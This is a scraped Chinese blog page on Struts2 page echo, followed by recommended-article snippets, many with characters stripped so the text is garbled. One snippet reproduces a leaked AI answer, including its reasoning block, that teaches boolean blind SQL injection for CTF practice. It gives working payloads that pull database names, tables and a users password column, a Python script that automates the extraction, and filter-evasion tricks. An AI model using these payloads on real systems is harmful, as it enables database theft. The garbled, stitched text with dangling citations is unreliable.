关于页面回显的笔记

最新推荐文章于 2024-11-04 15:58:39 发布
原创 最新推荐文章于 2024-11-04 15:58:39 发布 · 641 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍在修改操作中如何使用页面回显技术将对象置于栈顶并跳转到指定页面,确保页面能访问对象属性。同时探讨了隐藏域的设置及在后台获取隐藏域值的方法。

在涉及到修改时,通常需要用到页面回显技术,把对象放到值栈的对象栈的栈顶,并跳转到指定的页面,页面才能访问到当前对象的属性值。

隐藏域的赋值和后台获取隐藏域的值,需要在action类中定义隐藏域的set和get方法或者action类实现隐藏域属性相关的模型驱动

Duncan_Chen
关注
利用session存值,跳转刷新页面
Web_Notes的博客
08-04 3729
提交页面,中途选择选项时跳转了页面,返提交页面时刷新了,以前的数据消失,解决方法:利用session存储数据,返时再取出 思路:一、点击跳转时利用session把数据存起来 二、跳转页面再存session提交页 三、返页面,sessionStorage.getItem(key)获取之前存储的数据再放页面中 实现: 一、点击跳转时利用session把数据存起来 1.先保存需要存储的数据 var model = {};//var一个空对象,里面用来存所有数据 model.Pics = []//对象
项目笔记之jqGrid实现文件上传以及
zyhnini的博客
12-16 686
业务需求: 使用jqGridt添加功能时实现文件的上传及表格刷新和文件的 实现实例图: 实现步骤: 前台代码: <%-- Created by IntelliJ IDEA. User: 15757 Date: 2019/12/5 Time: 11:49 To change this template use File | Settings | File Temp...
页面图片
02-01
如何在不同浏览上(web项目页面),照片的功能? 已兼容IE8、谷歌、360
bdy9600的专栏
12-07 496
radio if( objsex=="男" ) { document.getElementById("p_nan").checked=true; } else { document.getElementById("p_nv").checked=true; } // $("#p_type").val(info.DSR_NATION); 下拉框 var s =
mubeibeinv的博客
11-04 314
1. 的方法 1.复制 列表方法 参数写需要的参数 2.sql语句和删除的语句一样 删除is_del=2 是 is_del=1 3.的参数 只有 id 集合还是反实体类 返值 也放实体类 2.的servlet 1.在dao层中参数只写了一个id 在servlet类中 只需要获取一个参数就可以 2.调用方法 3.在
是什么
m0_73875939的博客
11-07 2249
示正在执行的批处理命令及执行的结果等 (Echo)就是示正在执行的批处理命令及执行的结果等,位置是示在屏幕上。 输入就是,用户输入的字符直接示在电脑屏幕上。 无输入就是,敲键盘后屏幕不示你所敲的字符。 一些编译器支持无缓冲输入的函数在conio.h头文件中如:无缓冲输入getche()和无无缓冲输入getch()(这个可以帮你稍微了解
小程序开发笔记《四》picker之省市二级联动
菜菜的博客
06-01 1122
上篇文章介绍了小程序自定义省市二级联动选择器,但是当用户保存省市信息后再次进入页面,需要将选择器,这篇文章主要讲述自定义选择器。 实现思路: 通过后台返的省份编码,获取该省份在省份列表数组的下标值,并根据省份编码拿到该省份下的市级列表,并把市级列表放入picker的range属性对应数组的第二列,然后根据后台返的市级编码获取该市级在市级列表数组的下标值,拿到这两个下标值存入数组中然后赋...
SpringMVC学习笔记(十二)——数据
啦啦啦的博客
04-08 1058
博客源码下载:戳我一下 SpringMVC学习笔记汇总:SpringMVC学习笔记汇总 一、什么是数据 提交后,如果出现错误,将刚才提交的数据到刚才的提交页面。 二、pojo类型的数据 springmvc默认支持pojo数据,springmvc自动将形参中的pojo重新放request域中,request的key为pojo的类名(首字母小写),如下:’ con...
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
是什么鬼?浅谈
热门推荐
一只叫做Unix的猫
01-25 1万+
linux c 里面出现了一个叫做tcgetattr 和tcsetattr的两个函数  他们的功能能是获取位 以及设置位 详解http://blog.chinaunix.net/uid-10747583-id-97303.html 那么什么是? 你在键盘上按下一个“键”,如果在电脑上同时示出你按的内容,这就是;如果没有示,就不。 典型的两个
什么是
weixin_69302918的博客
11-07 3517
,就是示正在执行的批处理命令及执行的结果等。常常指程序开发中执行命令的结果,就是返示,你输入一个命令,然后给你返个值,示在屏幕上。 如果只是针对程序来说,第一行,是你的输入的内容,不是;第二行是程序处理的结果,是的内容。 如果,要是放到整个电脑来说,打什么,出什么,也是,但已经不是你写的程序的内容了。 常常指程序开发中执行命令的结果,就是返示,你输入一个命令,然后给你返一个值,示在屏幕上。 按照我个人的理解来说其实只要能拿到Request 和Response
数据
weixin_46405661的博客
10-31 431
数据 1.system/dept/dept-list.jsp <td><a href="/system/dept/toUpdate.do?id=${dept.deptId }">${dept.deptName }</a></td> 页面 <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %> <%@ page contentType="text/html;
是什么意思
m0_57236802的博客
11-15 2140
在计算机编程和脚本中,特别是在命令行环境下,“”(Echo)是指将输入的命令或脚本中的命令示(或“”)到输出设备(通常是屏幕)的行为。这意味着用户输入的每条命令或脚本中的每条命令在执行前都会先在屏幕上示出来。
什么是
weixin_66107848的博客
11-07 1938
(Echo)就是示正在执行的批处理命令及执行的结果等,位置是示在屏幕上。 举例 在执行有些命令的时候,如果不希望示返值,就要消除。比如:在用串口处理通信中,使用AT命令,来检测Module与串口是否连通,能否接收AT命令。命令返:OK (串口通信正常)(无返,与串口通信未连通)。用 ATE0去除。 数据就是当用户数据提交失败时,自动填充好已经输入的数据,一般来说,如果是使用Ajax来做数据提交,基本上是没有数据这个需求的,但是如果通过表单做数据提交,那么数据就非常必要
图片
qingTongYuan的博客
08-08 426
list.html加入以下红色代码 // 加载成功后执行事件 ajaxSuccess: function(data){ $("#gbox_dataGrid img").click(function (e) { var img=$(e.target).attr("src"); js.layer.open({ ...
布尔盲注的知识点笔记
最新发布
11-10
<think>我们被要求提供关于布尔盲注的知识点笔记。根据用户之前的查询和提供的参考资料,我们可以总结如下: 布尔盲注是SQL注入的一种,适用于当应用程序没有示数据库错误信息,但会根据查询返真假(True/False)来改变页面响应的场景。例如,页面可能返正常页面或错误页面(或不同的状态码),但不会直接示数据。 核心思想:通过构造SQL语句,根据页面的真假状态来逐位推断数据库中的信息(如数据库名、表名、字段名、数据内容等)。 步骤: 1. 判断注入点:通常通过输入真条件(如 `id=1 and 1=1`)和假条件(如 `id=1 and 1=2`)观察页面响应是否不同。 2. 推断数据库名的长度:使用`length(database())`函数,通过改变长度值并观察响应来判断。 例如:`?id=1' and length(database())=8 --+` 如果返正常页面,则数据库名长度为8。 3. 逐字符推断数据库名:使用`substr()`或`substring()`函数,结合`ascii()`函数将字符转换为ASCII码,然后通过比较ASCII码值来推断字符。 例如:`?id=1' and ascii(substr(database(),1,1))>97 --+` 判断第一个字符的ASCII码是否大于97,然后通过二分法缩小范围。 4. 推断表名:先推断表名的数量,再推断每个表名的长度,最后逐字符推断表名。 例如:获取第一个表名:`?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 --+` 5. 推断列名:类似表名。 6. 推断数据:类似。 在参考资料[^4]和[^5]中,提到了使用`limit`来逐个获取表,以及使用`length()`和`substr()`来获取长度和字符。 另外,在参考资料[^3]和[^5]中,提到了可以使用Python脚本自动化布尔盲注的过程。 布尔盲注的绕过技巧: - 如果引号被过滤,可以使用十六进制编码表示字符串。 - 如果空格被过滤,可以使用`/**/`或`%a0`等代替。 - 还可以考虑使用括号、注释等绕过。 布尔盲注的缺点:速度较慢,因为需要逐位判断。 自动化工具:sqlmap也可以用于布尔盲注(使用`--technique=B`),但手动编写脚本可以更灵活。 下面是一个简单的布尔盲注Python脚本框架(参考[^5]): ```python import requests url = "http://example.com/sqli?id=1" # 先获取数据库名长度 def get_database_length(): length = 0 while True: length += 1 payload = "' and length(database())={} -- ".format(length) params = {'id': '1' + payload} response = requests.get(url, params=params) # 根据页面内容判断,这里假设返内容中包含"query_success"表示真 if "query_success" in response.text: print("Database length:", length) return length # 获取数据库名 def get_database_name(length): database = "" for i in range(1, length+1): low = 32 high = 126 mid = (low + high) // 2 while low < high: # 判断第i个字符的ASCII码 payload = "' and ascii(substr(database(),{},1))>{} -- ".format(i, mid) params = {'id': '1' + payload} response = requests.get(url, params=params) if "query_success" in response.text: low = mid + 1 else: high = mid mid = (low + high) // 2 # 此时mid就是字符的ASCII码 database += chr(mid) print("Database name:", database) return database if __name__ == '__main__': length = get_database_length() get_database_name(length) ``` 注意:实际应用中需要根据目标页面的响应调整判断条件(例如,真条件的响应特征是什么,假条件的响应特征是什么)。 防御措施: - 使用预编译语句(参数化查询) - 对输入进行严格的过滤 - 使用最小权限原则 根据以上内容,我们整理布尔盲注的知识点笔记如下: </think>### CTFHub技能树布尔盲注知识点笔记 布尔盲注是SQL注入的核心技术之一,适用于**无错位、无数据但存在真假响应差异**的场景(如页面内容变化、HTTP状态码改变等)。以下是系统化总结: --- #### 一、核心原理 1. **盲注触发机制**: - 通过构造SQL条件语句(如`and 1=1`/`and 1=2`),观察页面响应差异: - **真条件**:返正常页面(HTTP 200)或特定关键字 - **假条件**:返错误页面(HTTP 404)或无数据内容[^1][^4] - **与报错注入的区别**: | 特性 | 布尔盲注 | 报错注入 | |--------------|-----------------------------|---------------------| | **响应依赖** | 页面状态/内容变化 | 数据库错误信息 | | **攻击速度** | 较慢(逐位爆破) | 较快(单次触发泄露)| | **适用场景** | 无错但存在响应差异 | 有数据库错误 | 2. **关键函数**: - **`length()`**:判断数据长度 ```sql ?id=1' AND length(database())>5 --+ -- 真则页面正常 ``` - **`substr()`或`substring()`**:截取数据字符 ```sql ?id=1' AND substr((SELECT database()),1,1)='a' --+ ``` - **`ascii()`**:字符转ASCII码(绕过引号过滤) ```sql ?id=1' AND ascii(substr(database(),1,1))>97 --+ -- 'a'的ASCII=97 ``` --- #### 二、实操步骤与技巧 1. **确认注入点与盲注类型**: ```sql ?id=1' and 1=1 --+ --> 正常页面 ?id=1' and 1=2 --+ --> 异常页面 # 确认布尔盲注存在[^4] ``` 2. **爆破数据库名**: - **STEP 1:判断长度** ```sql ?id=1' AND length(database())=8 --+ # 真则确定库名长度[^5] ``` - **STEP 2:逐字符爆破**(二分法加速) ```sql ?id=1' AND ascii(substr(database(),1,1))>100 --+ ``` 3. **爆破表名**: ```sql -- 第一张表长度 ?id=1' AND length((SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1))=4 --+ -- 第一张表首字母 ?id=1' AND ascii(substr((SELECT table_name ... LIMIT 0,1),1,1))=117 --+ # 'u'的ASCII码[^4] ``` 4. **爆破字段与数据**: ```sql -- 字段值爆破 ?id=1' AND ascii(substr((SELECT password FROM users LIMIT 0,1),1,1))=48 --+ # '0'的ASCII码[^5] ``` --- #### 三、自动化脚本(Python) ```python import requests def bool_blind_injection(url): result = "" for pos in range(1, 50): # 逐位置爆破 low, high = 32, 126 # ASCII范围(可打印字符) while low <= high: mid = (low + high) // 2 payload = f"1' AND ascii(substr((SELECT database()),{pos},1))>{mid} -- " response = requests.get(f"{url}?id={payload}") if "query_success" in response.text: # 根据实际响应关键词调整 low = mid + 1 else: high = mid - 1 result += chr(low) print(f"Position {pos}: {chr(low)}") return result print(bool_blind_injection("http://ctfhub.com")) ``` **关键参数**: - `query_success`:替换为实际真条件响应特征(如特定HTML标签) - 二分法将平均爆破次数从256次降至7次/字符[^3][^5] --- #### 四、特殊场景绕过 1. **引号过滤**: - 使用`CHAR()`函数: ```sql ?id=1' AND substr(database(),1,1)=CHAR(115) --+ # 's'=115 ``` - 十六进制编码: ```sql ?id=1' AND substr(database(),1,1)=0x73 --+ # 's'的十六进制 ``` 2. **空格过滤**: - 用`/**/`或`%0a`代替: ```sql ?id=1'/**/AND/**/ascii(substr(database(),1,1))>97/**/--+ ``` 3. **逻辑运算符过滤**: - 用`^`(异或)替代`and`: ```sql ?id=1' ^ (ascii(substr(database(),1,1))>97) --+ ``` --- #### 五、防御措施 1. **预编译语句**(参数化查询) 2. **Web应用防火墙**(WAF)过滤敏感函数(`substr`/`ascii`等) 3. **统一错误页面**(消除真假响应差异) 4. **最小权限原则**(限制数据库账户权限) > 通过靶场练习(如CTFHub布尔盲注关、SQLi Labs)可快速掌握核心技巧[^4][^5]。重点训练二分法脚本编写和响应特征识别能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值